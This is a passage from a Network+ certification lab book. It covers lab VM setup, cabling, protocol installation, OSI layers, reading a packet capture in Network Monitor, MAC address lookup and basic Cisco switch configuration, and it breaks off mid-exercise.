Network + Lab Book

Network+ Certification Study Guide, 4th Edition
Lab Book
Glen E. Clarke
Network+ Certification Study Guide, 4th Edition 0071615385
Glen E. Clarke
Table of Contents
LAB SETUP .................................................................................................................................................................8
EXERCISE 1-1 ..........................................................................................................................................................11
CRIMPING A CATEGORY 5 CABLE ............................................................................................................................11
EXERCISE 1-2 ..........................................................................................................................................................14
UNDERSTANDING CABLE TYPES ..............................................................................................................................14
EXERCISE 1-3 ..........................................................................................................................................................16
INSTALLING CABLING IN A BUS NETWORK ..............................................................................................................16
EXERCISE 1-4 ..........................................................................................................................................................17
IDENTIFYING THE DIFFERENT NETWORK ARCHITECTURES ......................................................................................17
EXERCISE 1-5 ..........................................................................................................................................................19
INSTALLING DNS ....................................................................................................................................................19
EXERCISE 2-1 ..........................................................................................................................................................20
INSTALLING NETBEUI ON WINDOWS 2000.............................................................................................................20
EXERCISE 2-2 ..........................................................................................................................................................22
INSTALLING IPX/SPX ON WINDOWS 2000 ..............................................................................................................22
EXERCISE 2-3 ..........................................................................................................................................................24
MIX AND MATCH OSI MODEL DEFINITIONS ...........................................................................................................24
EXERCISE 2-4 ..........................................................................................................................................................26
VIEWING PROTOCOL INFORMATION WITH NETWORK MONITOR ..............................................................................26
EXERCISE 2-5 ..........................................................................................................................................................30
ANALYZING NETWORK TRAFFIC .............................................................................................................................30
EXERCISE 3-1 ..........................................................................................................................................................31
CONFIGURING A NETWORK CARD ...........................................................................................................................31
EXERCISE 3-2 ..........................................................................................................................................................33
DETERMINING YOUR LOCAL MACHINES MAC ADDRESS ......................................................................................33
EXERCISE 3-3 ..........................................................................................................................................................35
Lab Book 2009 McGraw-Hill
-2-
Glen E. Clarke
DETERMINING THE NETWORK DEVICE TO USE ........................................................................................................35

EXERCISE 3-4 ..........................................................................................................................................................37
BASIC CONFIGURATION ON A CISCO SWITCH ..........................................................................................................37
EXERCISE 3-5 ..........................................................................................................................................................42
CONFIGURING VLANS ON A CISCO SWITCH ............................................................................................................42
EXERCISE 4-1 ..........................................................................................................................................................45
IDENTIFYING REMOTE SYSTEMS ..............................................................................................................................45
EXERCISE 4-2 ..........................................................................................................................................................47
CONVERTING DECIMAL TO BINARY .........................................................................................................................47
EXERCISE 4-3 ..........................................................................................................................................................49
CONVERTING BINARY TO DECIMAL.........................................................................................................................49
EXERCISE 4-4 ..........................................................................................................................................................51
IDENTIFYING ADDRESS CLASSES .............................................................................................................................51
EXERCISE 4-6 ..........................................................................................................................................................53
CONFIGURING TCP/IP TO USE DHCP .....................................................................................................................53
EXERCISE 4-7 ..........................................................................................................................................................54
CONFIGURING TCP/IP TO USE DNS AND WINS .....................................................................................................54
EXERCISE 4-8 ..........................................................................................................................................................55
INSTALLING AND CONFIGURING DHCP SERVICES ..................................................................................................55
EXERCISE 4-9 ..........................................................................................................................................................58
CONFIGURING A DNS ZONE ....................................................................................................................................58
EXERCISE 4-10 ........................................................................................................................................................60
CONFIGURING SAMBA ON LINUX .............................................................................................................................60
EXERCISE 5-1 ..........................................................................................................................................................63
SUBNETTING A CLASS B NETWORK.........................................................................................................................63
EXERCISE 5-2 ..........................................................................................................................................................65
SUBNETTING A CLASS A NETWORK ........................................................................................................................65
EXERCISE 5-3 ..........................................................................................................................................................67
-3-
Glen E. Clarke
SUBNETTING A CLASS C NETWORK.........................................................................................................................67

EXERCISE 5-4 ..........................................................................................................................................................69
CONFIGURING CISCO ROUTERS ...............................................................................................................................69
EXERCISE 6-1 ..........................................................................................................................................................72
USING ARP TO SEE YOUR LOCAL ARP CACHE ......................................................................................................72
EXERCISE 6-2 ..........................................................................................................................................................75
CONFIGURING TELNET ON WINDOWS SERVER 2003................................................................................................75
EXERCISE 6-3 ..........................................................................................................................................................77
USING NBTSTAT TO DETERMINE THE LOCAL NETBIOS NAME TABLE ................................................................77
EXERCISE 6-4 ..........................................................................................................................................................79
USING TRACERT TO DETERMINE INTERNET PATHS..................................................................................................79
EXERCISE 6-5 ..........................................................................................................................................................80
USING NETSTAT TO DETERMINE OPEN CONNECTIONS TO OTHER SYSTEMS ............................................................80
EXERCISE 6-6 ..........................................................................................................................................................81
USING IPCONFIG...................................................................................................................................................81
EXERCISE 6-7 ..........................................................................................................................................................82
CREATING THE FOLDER STRUCTURE ON THE FTP SERVER ......................................................................................82
EXERCISE 6-8 ..........................................................................................................................................................84
USING PING .............................................................................................................................................................84
EXERCISE 6-9 ..........................................................................................................................................................85
USING THE NSLOOKUP UTILITY ...........................................................................................................................85
EXERCISE 7-1 ..........................................................................................................................................................87
CONFIGURING A WIRELESS NETWORK ....................................................................................................................87
EXERCISE 8-1 ..........................................................................................................................................................89
CREATING A PPP DIAL-UP CONNECTION IN WINDOWS XP.....................................................................................89
EXERCISE 8-2 ..........................................................................................................................................................91
ENABLING MODEM LOGGING IN WINDOWS XP.......................................................................................................91
EXERCISE 8-3 ..........................................................................................................................................................92
-4-
Glen E. Clarke
SETTING UP A VPN SERVER IN WINDOWS SERVER 2003 ........................................................................................92

EXERCISE 8-4 ..........................................................................................................................................................95
SETTING UP WINDOWS XP AS A PPTP CLIENT .......................................................................................................95
EXERCISE 8-5 ..........................................................................................................................................................97
USING REMOTE DESKTOP ........................................................................................................................................97
EXERCISE 9-1 ..........................................................................................................................................................98
PACKET-SWITCHING NETWORK EXERCISE ..............................................................................................................98
EXERCISE 9-2 ........................................................................................................................................................100
ATM NETWORK EXERCISE ...................................................................................................................................100
EXERCISE 9-3 ........................................................................................................................................................101
FRAME RELAY NETWORK EXERCISE .....................................................................................................................101
EXERCISE 10-1 ......................................................................................................................................................103
CONFIRMING NETWORKING COMPONENTS IN WINDOWS XP.................................................................................103
EXERCISE 10-2 ......................................................................................................................................................104
INSTALLING WINDOWS SERVER 2003....................................................................................................................104
EXERCISE 10-3 ......................................................................................................................................................107
CREATING USERS IN ACTIVE DIRECTORY ..............................................................................................................107
EXERCISE 10-4 ......................................................................................................................................................108
CONFIGURING A PASSWORD POLICY .....................................................................................................................108
EXERCISE 10-5 ......................................................................................................................................................110
CREATING GROUPS IN ACTIVE DIRECTORY ...........................................................................................................110
EXERCISE 10-6 ......................................................................................................................................................111
CONFIGURING PERMISSIONS IN WINDOWS SERVER 2003 ......................................................................................111
EXERCISE 10-7 ......................................................................................................................................................113
INSTALLING A PRINTER ON A WINDOWS SERVER 2003 PRINT SERVER..................................................................113
EXERCISE 10-8 ......................................................................................................................................................115
CREATING ACCOUNTS (EXTRA CHALLENGE) ........................................................................................................115
EXERCISE 10-9 ......................................................................................................................................................116
-5-
Glen E. Clarke
IDENTIFYING BUILT-IN GROUPS ............................................................................................................................116

EXERCISE 11-1 ......................................................................................................................................................118
PATCHING A SYSTEM WITH WINDOWS UPDATE .....................................................................................................118
EXERCISE 11-2 ......................................................................................................................................................120
INSTALLING AND CONFIGURING ANTIVIRUS SOFTWARE .......................................................................................120
EXERCISE 11-3 ......................................................................................................................................................123
INSTALLING AND CONFIGURING WINDOWS DEFENDER .........................................................................................123
EXERCISE 11-4 ......................................................................................................................................................125
BACKING UP AND RESTORING DATA ON WINDOWS SERVER 2003 ........................................................................125
EXERCISE 11-5 ......................................................................................................................................................127
CONFIGURING RAID 0 IN 2003 SERVER................................................................................................................127
EXERCISE 11-6 ......................................................................................................................................................129
CREATING A MIRRORED VOLUME IN WINDOWS SERVER 2003..............................................................................129
EXERCISE 11-7 ......................................................................................................................................................130
CREATING A RAID 5 VOLUME WITH WINDOWS SERVER 2003 .............................................................................130
EXERCISE 11-8 ......................................................................................................................................................131
UNDERSTANDING RAID TYPES .............................................................................................................................131
EXERCISE 12-1 ......................................................................................................................................................133
SETTING PERMISSIONS ON REGISTRY KEYS ...........................................................................................................133
EXERCISE 12-2 ......................................................................................................................................................135
ASSIGNING USER RIGHTS IN WINDOWS XP ...........................................................................................................135
EXERCISE 12-3 ......................................................................................................................................................136
CONFIGURING AUDITING .......................................................................................................................................136
EXERCISE 12-4 ......................................................................................................................................................138
ENABLING A WINDOWS XP/WINDOWS SERVER 2003 FIREWALL ..........................................................................138
EXERCISE 12-5 ......................................................................................................................................................140
ENCRYPTING FILES WITH WINDOWS XP................................................................................................................140
EXERCISE 12-6 ......................................................................................................................................................141
-6-
Glen E. Clarke
CONFIGURING IPSEC TO SECURE NETWORK TRAFFIC ............................................................................................141

EXERCISE 12-7 ......................................................................................................................................................144
UNDERSTANDING THE IMPORTANCE OF PATCHING A SERVER ...............................................................................144
EXERCISE 12-8 ......................................................................................................................................................146
PERFORMING A VULNERABILITY SCAN WITH LANGUARD .....................................................................................146
EXERCISE 12-9 ......................................................................................................................................................148
UNDERSTANDING SECURITY TERMS ......................................................................................................................148
EXERCISE 13-1 ......................................................................................................................................................151
USING DEVICE MANAGER .....................................................................................................................................151
EXERCISE 13-2 ......................................................................................................................................................152
CHECKING EVENT LOGS ........................................................................................................................................152
EXERCISE 13-3 ......................................................................................................................................................153
USING SYSTEM MONITOR ......................................................................................................................................153
-7-
Glen E. Clarke
Lab Setup
This lab book has been developed with a number of different operating systems available.
In order to follow the step-by-step exercises in this lab book, you will need to install and
configure the following systems in VMware. All admin accounts are named administrator
with a password of Pa$$w0rd unless otherwise specified.
Virtual Machine
Computer 1: Window Server 2003
Configuration
Operating System: Windows Server 2003
Patch Level: None
Drives: 4 Drives
Computername: 2003ServerA
IP Address: 10.0.0.1
Subnet Masks: 255.0.0.0
Gateway:
DNS: 10.0.0.1
Software: Install IIS with ASP and use the
classroom web site files from CD-ROM. Also
install the FTP service in IIS. Install Active
Directory and create a new domain called
networkplus.loc. Create an MX record for
networkplus.loc that points to 2003SERVERA.
Also create an A record for www and ftp that
point to 2003SERVERA. Allow zone transfers
in DNS for networkplus.loc. Install POP3
service and configure a mailbox for the
administrator. Configure Outlook express to
read mail from the administrator Mailbox.
Computer 2: Windows Server 2003
Operating System: Windows Server 2003
-8-
Glen E. Clarke
Patch Level: None

Drives: 4 Drives
Computername: 2003ServerB
Gateway: 10.0.0.1
DNS: 10.0.0.1
Computer 3: Windows XP Client
Operating System: Windows XP

Patch Level: None
Drives: 1 Drive
Computername: XPClient
Gateway: 10.0.0.1
DNS: 10.0.0.1
Setup Notes: Create a user named Bob with a
password of password.
Computer 4: Windows 2000 Server
Operating System: Windows 2000 Server

Patch Level: None
Drives: 1 Drive
Computername: 2000Server
Gateway: 10.0.0.1
-9-
Glen E. Clarke
DNS: 10.0.0.1
Admin Account: administrator
Password: !Pass1234
Computer 5: Linux Red Hat 8/9
Operating System: Linux Red Hat

Patch Level: None
Drives: 1 Drive
Computername: - N/A IP Address: 10.0.0.30
Gateway: 10.0.0.1
DNS: 10.0.0.1
- 10 -
Glen E. Clarke
Exercise 1-1
Crimping a Category 5 Cable
In this exercise, you will learn how to crimp your own CAT 5 cable. To complete this
exercise, you will need to have a crimping tool, a piece of CAT 5 cabling, some RJ-45
connectors, and a little bit of patience! To create a CAT 5 cable, do the following:
1. Ensure that you have a clean-cut end on the cable by using your wire cutters to cut a little off
the end of the CAT 5 cable.
2. Once you have cut a clean end on the cable, strip about an inch off the outer jacket from the
cable using the wire-stripper portion of your crimping tool, as shown in the next illustration.
After stripping the outer jacket off, make sure that you have not cut into any of the individual
wires. If you have, cut a clean end off the cable again and start from the beginning.
3. Once you have stripped the outer jacket off the cable, order the wires from left to right to
follow the 568B standard. This is where your patience will come in, because it will take some
time to get the wires in the correct order and placed tightly together so that they will go
inside the RJ-45 connector.
4. Once you have the wires aligned in the correct order and you have them all nice and snug
together so that they will fit inside the RJ-45 connector, you are ready to insert them into the
- 11 -
Glen E. Clarke
connector. Before inserting the wires into the connector, make sure that their ends are of
equal length; if they are not, just cut the tips a bit with your wire cutters, as shown in the
following illustration, to be certain that they will fit nicely into the RJ-45 connector.
5. Slide the wires into the RJ-45 connector, as shown in the next illustration, and make sure that
all wires have made contact with the metal contacts inside the RJ-45 connector by looking at
the end of the connector. This is where mistakes happen frequently; there is usually one wire
in the middle that is not pushed up to the end of the connector.
- 12 -
Glen E. Clarke
6. Once you are certain that all wires have made contact, you can crimp the wire, which will
enclose the RJ-45 connector on the wires, creating a permanent fit. Insert the connector into
the crimping tool and squeeze the handle tight, as seen in the following illustration.
- 13 -
Glen E. Clarke
Exercise 1-2
Understanding Cable Types
A company wants to hire you to design a cable installation based on its specifications.
The firm has three buildings that are all similar in size. The buildings each have four floors; each
floor has eight-foot ceilings and roughly 75 users. The dimensions of each building are 100
meters by 200 meters. The company requires high bandwidth and wants to have 100 Mbps of
network speeds using a cable that will possibly be usable for faster speeds later.
One issue that must be overcome is that a radio station has a broadcast tower two blocks
away that causes interference on all electrical signal devices in the area. The buildings are all in
close proximity, since they each cover one block and are all at the same intersection, as shown in
the illustration. The wire closets are in the center of each building on each floor.
How would you go about solving this problem?

- 14 -
Glen E. Clarke
One possible solution is as follows:

1. Each building should be joined by fiber-optic cable: Building 1 to Building 2 and Building 2
to Building 3. It is feasible to connect Building 1 and Building 3 to allow for redundant
paths.
2. Each floor then will use STP cable to eliminate the radio frequency interference (RFI)
generated by the radio station. STP cable also will be used to connect the switches to the
router in each building. (Note: With the maximum distance being 100 meters from the switch
to the most distant PC, it is possible to use a higher-grade cable to allow for a distance of
more than 100 meters. The cables should be a minimum of Category 5, but higher grades do
exist, such as Category 6.)
- 15 -
Glen E. Clarke
Exercise 1-3
Installing Cabling in a Bus Network
In this exercise, you will learn how to install thinnet cabling in a bus topology. To install
a workstation on a thinnet network, perform the following:
1. Have all PCs in place with network cards that have a BNC connector.
2. Run cable between all PCs in a line so that the cable length is no more than 185 meters (606
feet).
3. Use a crimping tool to place a BNC connector on all ends of the cables.
4. Place a T-connector on all the BNC network interfaces.
5. Connect an end of each cable to an end of the T-connector (from one computer to another).
6. Place a terminator on the two PCs that are on the ends of the bus that have an empty socket
on the T-connector.
- 16 -
Glen E. Clarke
Exercise 1-4
Identifying the Different Network Architectures
In this exercise, you will review the different network architectures by filling in the table.
After reading the description, specify which network architecture would be used.
Description
Network Technology to Use
I want to have a network that runs at 10

Mbps, using a star topology and UTP
cabling. What architecture should I use?
I want to have a 1000 Mbps network that

uses my existing CAT 5 cabling. What
type of network architecture should I use?
As a network technician, I want to build a

network that uses an architecture that
runs at 1000 Mbps and can handle a
distance of about 1 kilometer. What
network architecture should I use?

Mbps, using a star topology, and UTP
I want to build a network that runs at 10

Gbps and can span about 100 meters.
What network architecture should I use?
- 17 -
Glen E. Clarke
The following table identifies the answers you should have.

Description
Network Technology to Use
10BaseT, which uses CAT 3
Mbps, using a star topology and UTP

I want to have a 1000 Mbps network that
1000BaseTX (Gigabit Ethernet using
uses my existing CAT 5 cabling. What
CAT 5 or CAT 5e)
type of network architecture should I use?
As a network technician, I want to build a
1000BaseLX (Gigabit Ethernet using
network that uses an architecture that
single-mode fiber-optic cable)
runs at 1000 Mbps and can handle a

distance of about 1 kilometer. What
network architecture should I use?
100BaseTX,which uses CAT 5
Mbps, using a star topology, and UTP

I want to build a network that runs at 10
10GBaseSR (10-Gigabit Ethernet using
Gbps and can span about 100 meters.
multimode fiber-optic cable)
What network architecture should I use?
- 18 -
Glen E. Clarke
Exercise 1-5
Installing DNS
This exercise shows you how to install the DNS Service on Windows 2003. The exercise
is designed to demonstrate the ease of use of the operating system, rather than to demonstrate
how to configure DNS. To install DNS, do the following:
1. Start the 2003ServerB VM.
2. Choose Start | Control Panel | Add Or Remove Programs.
3. Once the Add Or Remove Programs window opens, click the Add/Remove Windows
Components option on the left side of the window.
4. Once the Windows Components Wizard dialog box displays, scroll down to Networking
Services. Select Networking Services and then choose Details.
5. In the Networking Services dialog box, choose the Domain Name System check box (shown
next).
6. Choose OK.
7. Choose Next. Windows will copy the required files from the Windows 2003 CD.
8. Choose Finish and close the Add Or Remove Programs dialog box.
- 19 -
Glen E. Clarke
Exercise 2-1
Installing NetBEUI on Windows 2000
This exercise is designed to demonstrate to you the steps to install a protocol on a
Windows operating system. Although the steps will install NetBEUI, you can install other
protocols such as IPX/SPX and TCP/IP the same way. To install NetBEUI, do the following:
1. Log on to the Windows 2000 Server VM with an administrative account.
2. Right-click My Network Places and choose Properties, as shown in the accompanying
illustration.
3. In the Network and Dial-up Connections dialog box, right-click your LAN Connection and
choose Properties, as shown next.
- 20 -
Glen E. Clarke
4. Once in the LAN Connection Properties, you want to install the NetBEUI protocol, so click
Install, as shown next.
5. You wish to install a protocol, so select Protocol from the Network Component list and then
click Add.
6. In the Protocol list, select NetBEUI and then choose OK to install it.
7. Once you see the NetBEUI protocol in your LAN Connection Properties, click Close and
you are done!
- 21 -
Glen E. Clarke
Exercise 2-2
Installing IPX/SPX on Windows 2000
This exercise will demonstrate to you the steps needed to install and configure IPX/SPX
on a Windows 2000 system. Be aware that the Microsoft implementation (which means the
Microsoft version) of IPX/SPX is known as NWLink. To install and configure IPX/SPX,
perform the following steps.
1. Log on to the Windows 2000 Server VM with an administrative account.
2. Right-click My Network Places and choose Properties.
3. In the Network and Dial-up Connections dialog box, right-click your LAN connection and
choose Properties.
4. Once in the LAN Connection Properties, you wish to install the NWLink (IPX/SPX)
protocol, so click Install.
5. You wish to install a protocol, so select Protocol from the Network Component list and then
click Add.
6. In the Protocol list, select NWLink (IPX/SPX) (seen next) and then choose OK to install it.
7. Once the protocol has been installed, you will see the NWLink IPX/SPX item in the
Components list.
- 22 -
Glen E. Clarke
8. Select the NWLink IPX/SPX protocol and then choose Properties to configure the protocol.
9. In the properties of IPX/SPX, to change the frame type used by the protocol, select Manual
Frame Type Detection, as shown in the accompanying illustration, and then choose Add.
10. In the Manual Frame Type Detection dialog box, select the frame type you wish to configure
the system to use and then choose OK.
11. Choose OK.
12. Choose Close.
- 23 -
Glen E. Clarke
Exercise 2-3
Mix and Match OSI Model Definitions
In this exercise, you will take a look at some terms and match them with their appropriate
definitions. This exercise is designed to give you the opportunity to identify the purpose of each
layer of the OSI model.
Layer
Definition
A. Session
_____ Responsible for the logical addressing and delivery of the

packets.
B. Physical
_____ Responsible for formatting the message.
C. Application
_____ Responsible for physical addressing and converts the data

packets to electrical signals.
D. Network
_____ Responsible for creating, managing, and ending a connection.
E. Data link
_____ Responsible for reliable delivery, sequencing, and breaking the

message into packets.
F. Presentation
_____ Places or removes the signal on and off the wire.
G. Transport
_____ Initiates or receives the network request.
Once you have matched the previous list of layers with a definition, review the following
for the answers:
Definition
__D__ Responsible for the logical addressing and delivery of the packets.
__F__ Responsible for formatting the message.
__E__ Responsible for physical addressing and converts the data packets to
electrical signals.
- 24 -
Glen E. Clarke
__A__ Responsible for creating, managing, and ending a connection.

__G__ Responsible for reliable delivery, sequencing, and breaking the message
into packets.
__B__ Places or removes the signal on and off the wire.
__C__ Initiates or receives the network request.
- 25 -
Glen E. Clarke
Exercise 2-4
Viewing Protocol Information with Network Monitor
In this exercise, you will install a network-monitoring tool known as Network Monitor
that comes with Windows Servers, and you will look at network traffic that was captured
previously in file. The example is that a user has filled a credit card number into a web site and
you have captured the traffic. Your end goal is to find the credit card number in the packet.
Lets start the exercise by installing the Network Monitor software on your system. These
steps were written for Windows 2003 Server.
Installing Network Monitor on Windows 2003 Server
1. Go to the 2003SERVERA system.
2. Go to Start | Control Panel | Add/Remove Programs.
3. In the Add/Remove Programs dialog box, choose the Add/Remove Windows Components
on the left side.
4. In the Windows Component Wizard, scroll down to find Management and Monitoring Tools.
Highlight Management and Monitoring Tools and choose Details.
5. In the Management and Monitoring Tools dialog box, check the Network Monitor Tools
check box (shown in the accompanying illustration) and choose OK.
- 26 -
Glen E. Clarke
6. Choose OK. You may be asked for the Windows Server 2003 CD.
7. When the file copy is complete, choose Finish.
8. Click Close.
9. Close the Control Panel.
Viewing Packet Data with Network Monitor
10. To start Network Monitor, go to Start | All Programs | Administrative Tools | Network
Analysis Tools | Network Monitor.
11. When you start Network Monitor, it may ask you to select a network (which means choosing
your network card). Select the network card on the left that shows a dialup adapter on the
right as being false (shown next). This will be your network card, as opposed to the modem
on the system. You want to capture traffic from this network card eventually.
12. Once the network card has been selected, you should have Network Monitor on the screen in
front of you. You want to view network traffic that was captured previously, so choose File |
Open.
13. In the Open dialog box, open the HTTPTraffic.cap file located in the
LabFiles\PacketCaptures folder.
14. The contents of the packet capture are displayed. Notice that there are 24 frames (numbers
listed down the left) captured and that frame 16 is the actual HTTP Post Request, which is
the forms information posted to the server. This is the phase where the credit card number
was submitted. You will use frame 16 as your learning tool to view network traffic.
15. Double-click frame 16 to view the details of the traffic.
- 27 -
Glen E. Clarke
16. The window is divided into three panes; the top pane is the summary pane listing all the
frames, the middle pane is the detail pane showing your packet details, and the bottom pane
is showing the hex data for that frame. Ensure that frame 16 is still selected in the summary
pane so that you can investigate your packet.
17. In the detail pane (middle part of the screen), double-click Ethernet, which will expand the
Ethernet section showing you the source and destination Ethernet addresses or MAC
addresses.
18. Record the source MAC address, which is the system that sent the packet, in the blanks.
Source MAC address: ____________________________________
What layer of the OSI model does this information pertain to? ___________
19. Below the Ethernet section is the protocol information. What layer-3 protocol is this network
traffic using? _____________________________
20. If you answered IP in the preceding question, you are correct! If you double-click the IP
section, you will see what layer-3 addresses (IP addresses) are the source of the packet and
the destination of the packet.
21. Fill in the following information:
Where is the packet headed? ________________________
Where did the packet come from? _____________________
Hint: View the source and destination addresses.
22. You also can see what transport protocol was used by IP to deliver this packet. Two lines
above the source IP address, you can see that IP is using TCP, a connection-oriented layer-4
protocol, to ensure that the packet reaches the destination.
23. If you double-click the IP heading, you will collapse the details of IP. Lets look at the
application protocol information for this packet. You want to see the credit card number that
was typed into the web page. In the details pane, double-click HTTP to expand the detailed
application information.
- 28 -
Glen E. Clarke
24. Select the last piece of information for HTTP, which is the HTTP: Data: line. To view the
data that was typed into the browser, look in the bottom right of the screen.
25. What was the credit card number? __________________
26. Close Network Monitor.
This exercise has shown you how to view layer-2 information in a packet, such as the
source and destination addresses. It also has shown you how to view logical address information,
such as the source and destination IP addresses, which were found with layer-3 information. You
also saw that the layer-3 protocol (IP) was relying on TCP for ensuring the delivery of the
information. Finally, you viewed the application information that was submitted with the request.
This also shows you why it is important to ensure that you are using an encryption protocol to
encrypt the data typed into a web site!
- 29 -
Glen E. Clarke
Exercise 2-5
Analyzing Network Traffic
Your manager has been recording network traffic to your web server and has noticed that
someone has been submitting fake data into the online store. She wants you to open one of the
packet captures stored in Lab2.cap (located in your LabFiles\PacketCaptures folder) and
analyze one of the packets. She would like you to report back to her the following information:
Source MAC Address: _________________________

Source IP Address: ____________________________
Destination IP Address: ________________________
Fake Credit Card Number Used: _________________
If you have trouble with this lab, look back to the exercise walk-through you did to learn
where to find information about layer-2 and layer-3 addresses and also where to find the specific
application data.
Exercise Answer:
After you have opened the packet capture file of lab2.cap, you would focus on the
Ethernet section to find the MAC address, the IP section to find the source and destination IP
addresses, and the HTTP section to find out the fake credit card number that was submitted. You
should have come up with the following answers:
Source MAC Address: 00119520028C
Source IP Address: 192.168.1.6
Destination IP Address: 192.168.1.3
Fake Credit Card Number Used: 5678
- 30 -
Glen E. Clarke
Exercise 3-1
Configuring a Network Card
In this exercise, you will learn how to configure a number of different settings on a
network card in Windows Server 2003 through Device Manager, including transceiver type,
transfer rate, and transmission type. The dialog boxes are particular to the device driver; you may
have different screens on your system, but the general idea should be the same.
1. Switch to the 2003SERVERA VM.
2. To configure the properties of a network card, go to Device Manager by clicking Start, rightclicking My Computer, and choosing the Properties command.
3. Select the Hardware tab and then click the Device Manager button.
4. Expand out the Network Adapters category and select your network card in the list. Rightclick your network card and choose Properties.
5. In the properties of the network card, select the Advanced tab to set your network card
settings.
6. On the Advanced tab, you should see a list of properties that may include transceiver,
transfer speed, and duplex properties. In my example, I have only one property for all three
items, which is called MediaType. MediaType is set to Auto_Config by default, and if I want
to set the card to 100 Mbps using the RJ-45 transceiver and full duplex, I would set the
- 31 -
Glen E. Clarke
MediaType property to 100BaseTXFull_Duplex, as shown in the accompanying illustration.
7. Click OK.
8. Close Device Manager.
9. Click OK out of the System Properties.
- 32 -
Glen E. Clarke
Exercise 3-2
Determining Your Local Machines MAC Address
In this exercise, you will learn how to determine the MAC address of your computer
using Windows XP. You will then go to the Internet site of www.coffer.com/mac_find/ to
determine the manufacturer of your network card.
1. To start a command prompt, select Start | Run, type CMD, and then press ENTER.
2. When the command prompt appears, type ipconfig /all to view your TCP/IP settings and
MAC address.
3. Record your MAC address here:
Physical Address: _______________________________
4. Once you have recorded the MAC address, start Internet Explorer and navigate to
www.coffer.com/mac_find/. This site is used to input the first six characters of the MAC
address, which represent the address of the manufacturer of the card, and the site will tell you
who manufactured the card.
5. Once you access the MAC address find site, fill in the MAC Address or Vendor to look for
text box with the first six characters of your MAC address and click String. For example, the
first six characters of my MAC address are 00-90-4B, so I would type 00904B.
6. In the middle of the page, your network card manufacturer will be displayed. In my example,
the manufacturer of all cards starting with 00-90-4B appears to be Gemtek Technology Co.
7. Take a few minutes and search for manufacturers of the following MAC addresses. Once you
find the manufacturer, fill in the table that follows:
MAC Address
Manufacturer
00-B0-D0-B1-ED-51
- 33 -
Glen E. Clarke
00-0D-60-48-53-9E
00-A0-C9-C3-D2-E2
8. Now that you have searched for the vendor of a MAC address by using the manufacturer ID
portion of the MAC address, lets search by manufacturer! In the String To Search For text
box, type Intel and click Search. Record the first five manufacturer IDs in the spaces
provided.
_____________________
_____________________
_____________________
_____________________
_____________________
9. Close the browser when you have finished.
- 34 -
Glen E. Clarke
Exercise 3-3
Determining the Network Device to Use
In this exercise, you will read over three scenarios and then choose the network device to
use for the scenario, or you may want to replace an existing device with another device:
1. A company has a problem with its network. An IT employee finds the central connection
device of the ring network is faulty. He sends another, newly hired IT employee to a local
electronics store to find a similar device to replace the device that failed. The new IT
employee does not take the existing device, but she does notice that it is nonpowered and has
24 RJ-45 ports on it. She returns with a device that is nonpowered and has 24 RJ-45 ports.
The device is installed and all PCs are powered back on, but the network is still not
functioning. What is the problem, and how can it be fixed?
2. Recently, a companys central network device failed. They sent a salesperson to purchase a
replacement that would be inexpensive. The salesperson returned with a new device, and it
was installed. It cost about half the price of some other devices at the store and had the same
number of ports and port types. After the device was installed, some PCs functioned fine on
the network, while others were unable to access any network resources. It was determined
that the PCs that could not access the network resources were located further from the central
connection device than the PCs that did work properly. What is the problem?
3. A company recently purchased a new building that is 2.5 blocks from the existing
headquarters. The company wants to have the two buildings joined by fiber-optic cables to
allow the buildings to be on the same network. The IT department contracts with a company
to run the fiber-optic cables between the buildings, and the IT staff have purchased two
routers to place in each building that have fiber-optic connectors on them. The routers were
placed on back order because of low stock at the manufacturer. Meanwhile, the fiber-optic
cable has been run between the buildings, and the cable ends are left hanging in the two
server rooms for the routers to be hooked to them. When the routers finally arrive, they are
installed by a technician who places the routers in the appropriate building and connect the
cables to them. Immediately, the staff notices that the two buildings cannot connect to one
another. A router specialist is contracted to verify that the routers are configured correctly.
- 35 -
Glen E. Clarke
The two buildings are still unable to communicate with one another. What possibly can be
wrong if the fiber-optic cables have been installed correctly between the two buildings?
The answers for the three scenarios are as follows:

1. The employee apparently purchased a passive hub that has 24 RJ-45 ports, not a 24-port
MAU. The passive hub needs to be replaced with a MAU, or the Token Ring NICs need to
be replaced with Ethernet NICs.
2. The hub that was purchased was working fine, but it was apparently not an active hub;
therefore, it did not regenerate the data signals and caused the usable cable distance to be cut
in half. This caused any PCs that were farther than 100 meters from each other by cable
distance not to be able to communicate. The active hub allows each cable length from the
hub to the PC to be 100 meters via Category 3 or higher cable.
3. The fiber-optic cable ends have been placed in the routers incorrectly. With fiber-optic
cables, there are two cables. One cable is for transmitting data one way, and the other cable is
for transmitting in the opposite direction. This system allows for full-duplex communication.
If the transmit cable from one building is placed in the transmit port at the other building, the
data will not be received by either end. The cables need to be switched at one building.
- 36 -
Glen E. Clarke
Exercise 3-4
Basic Configuration on a Cisco Switch
In this exercise, you will configure a Cisco 1900 Series Catalyst switch by using the
menu system. You will configure settings such as the name of the switch and the IP address of
the switch, disable ports, and configure port mirroring (aka monitoring).
1. To manage the switch, connect the console cable (also known as a rollover cable) to the
serial port on the back of your computer and then the other end to the console port on the
back of the switch.
2. On your computer, start HyperTerminal by choosing Start | Programs | Accessories |
Communication | HyperTerminal.
3. If asked your Area Code in HyperTerminal, type it in then choose OK and then OK again
on the Location.
4. You are then asked for a name of the new connection. Type mySwitch and then choose OK.
5. In the Connect To dialog box, choose COM1 in the Connect Using drop-down list and
choose OK.
- 37 -
Glen E. Clarke
6. In the COM1 Properties dialog box, change the bits per second to 9600 and set the flow
control to None (shown next).
7. Click OK.
8. Power on the switch. You should see the output of the switch booting up that includes the
make and model of the switch and the version of the Cisco IOS.
- 38 -
Glen E. Clarke
Changing the Name of the Switch

9. The menu appears after bootup asking how you want to configure the switchfrom
command line (CLI) or menu.
10. Using the menu system, you will change the name of the switch. Choose M for menu and
then choose S to change system settings.
11. Choose N to change the name of the system (switch).
12. Type Switch1 as the name and press ENTER.
13. You can see the name of the system has been changed. Choose X to exit back to the main
menu.
Setting the IP Address on the Switch
14. To change the IP address of the switch, choose N for network management from the main
menu.
15. Choose I for IP configuration
16. Choose I to set the IP address to 10.0.0.150 and press ENTER.
17. Choose S to set the subnet mask to 255.0.0.0 and press ENTER.
- 39 -
Glen E. Clarke
18. Choose G to set the default gateway to 10.0.0.1 and press ENTER.
19. Press X to go to the previous menu and X again to go to the main menu.
Disabling Ports
20. To disable port 5 on the switch, choose P for port configuration.
21. Type 5 for port number 5.
22. Choose S for status of the port and then type D to disable the port and then press ENTER. You
can see that the port is disabled.
23. Choose X to go back to the main menu.
24. Connect your workstation to port number 5 and you should see an amber light indicating that
the port is disabled. Normally a green link light displays if the port is functioning.
Configuring a Static Address on the Port (Known as Port Address Security)
25. Next, assign a MAC address to a port so that no other system can connect to that port. From
